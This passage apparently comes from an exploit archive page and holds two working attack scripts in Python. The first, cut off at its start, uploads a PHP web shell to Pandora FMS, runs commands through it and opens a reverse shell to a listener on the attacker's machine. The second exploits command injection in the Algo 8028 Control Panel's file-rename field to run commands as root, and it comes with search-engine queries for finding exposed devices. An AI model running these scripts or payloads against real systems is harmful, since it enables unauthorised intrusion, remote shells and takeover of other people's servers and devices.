'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1' } params = ( ('sec', 'gsetup'), ('sec2', 'godmode/setup/file_manager') ) cookies = {'PHPSESSID': targetSess} # Basic PHP web shell with 'cmd' parameter data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n' # Try to upload the PHP web shell to the server try: response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False) except: print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}") exit() statusCode=response.status_code if statusCode == 200: print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}") else: print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}") exit() loading(15) print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}") loading(15) # Print web shell location if in web shell mode if exploitMode == "web": print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}") print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n") # Run custom command on web shell if in command mode if exploitMode == "command": response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}') print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n") print(response.text) # Run reverse shell command if in reverse shell mode if exploitMode == "shell": shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'" try: requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1) print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n") except: print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-t','-u','-p','-s','-c','-w'] modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'} # Initialize starting variables targetIP = None targetPort = None targetUser = None targetPass = None targetSess = None command = None localIP = None localPort = None webName = "unicord.php" # Default web shell file name exploitMode = "web" # Default to web shell mode # Print help if specified or if a target or authentication is not provided if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv): help() # Collect target IP and port from CLI if args[1] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[1]) + 1]: raise targetIP = sys.argv[sys.argv.index(args[1]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[1]) + 2]: raise targetPort = sys.argv[sys.argv.index(args[1]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() # Collect target username and password from CLI if args[2] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[2]) + 1]: raise targetUser = sys.argv[sys.argv.index(args[2]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[2]) + 2]: raise targetPass = sys.argv[sys.argv.index(args[2]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}") exit() # Collect PHPSESSID from CLI, if specified if args[3] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[3]) + 1]: raise targetSess = sys.argv[sys.argv.index(args[3]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}") exit() # Set reverse shell mode from CLI, if specified if args[4] in sys.argv: exploitMode = "shell" try: if "-" in sys.argv[sys.argv.index(args[4]) + 1]: raise localIP = sys.argv[sys.argv.index(args[4]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[4]) + 2]: raise localPort = sys.argv[sys.argv.index(args[4]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}") exit() exploit(exploitMode,targetSess) # Set custom command mode from CLI, if specified elif args[5] in sys.argv: exploitMode = "command" try: if sys.argv[sys.argv.index(args[5]) + 1] in args: raise command = sys.argv[sys.argv.index(args[5]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}") exit() exploit(exploitMode,targetSess) # Set web shell mode from CLI, if specified elif args[6] in sys.argv: exploitMode = "web" try: if sys.argv[sys.argv.index(args[6]) + 1] in args: raise if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]: webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php" else: webName = sys.argv[sys.argv.index(args[6]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}") exit() exploit(exploitMode,targetSess) # Run with default web shell mode if no mode is specified else: exploit(exploitMode,targetSess) </code></pre>

<pre><code># Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:"Algo 8028 Control Panel" # Shodan: title:"Algo 8028 Control Panel" # Date: 2022-06-07 # Exploit Author: Filip Carlsson # Vendor Homepage: https://www.algosolutions.com/ # Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/ # Version: 3.3.3 # Tested on: Version 3.3.3 # CVE : N/A # Exploit: # Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root # Request: POST # Formdata: # action: rename # source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;" # target: / #!/usr/bin/env python3 import sys import requests cookie=None def main(): # check if provided 3 args if len(sys.argv) != 4: print_help() return else: host = sys.argv[1] password = sys.argv[2] command = sys.argv[3] if login(host, password): # if login was successful, send command send_command(host, command) def print_help(): print("Usage: algo.py 192.168.1.123 password command") print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"") def login(host, password): url = f"http://{host}/index.lua" data = {"pwd": password} res = requests.post(url, data=data) # check if html contains "Invalid Password" if "Invalid Password" in res.text: print("Invalid password") return False else: # save cookie global cookie cookie = res.cookies print("Successfully logged in\n") return True def send_command(host, command): url = f"http://{host}/control/fm-data.lua" data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"} res = requests.post(url, data=data, cookies=cookie) # get http://host/cmd.txt url = f"http://{host}/a.txt" res = requests.get(url) # if "404 Not Found" in text then command was not executed if "404 Not Found" in res.text: print("Command was not executed (404)") else: print(res.text) # delete cmd.txt url = f"http://{host}/control/fm-data.lua" data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"} requests.post(url, data=data, cookies=cookie) if __name__ == "__main__": main() </code></pre>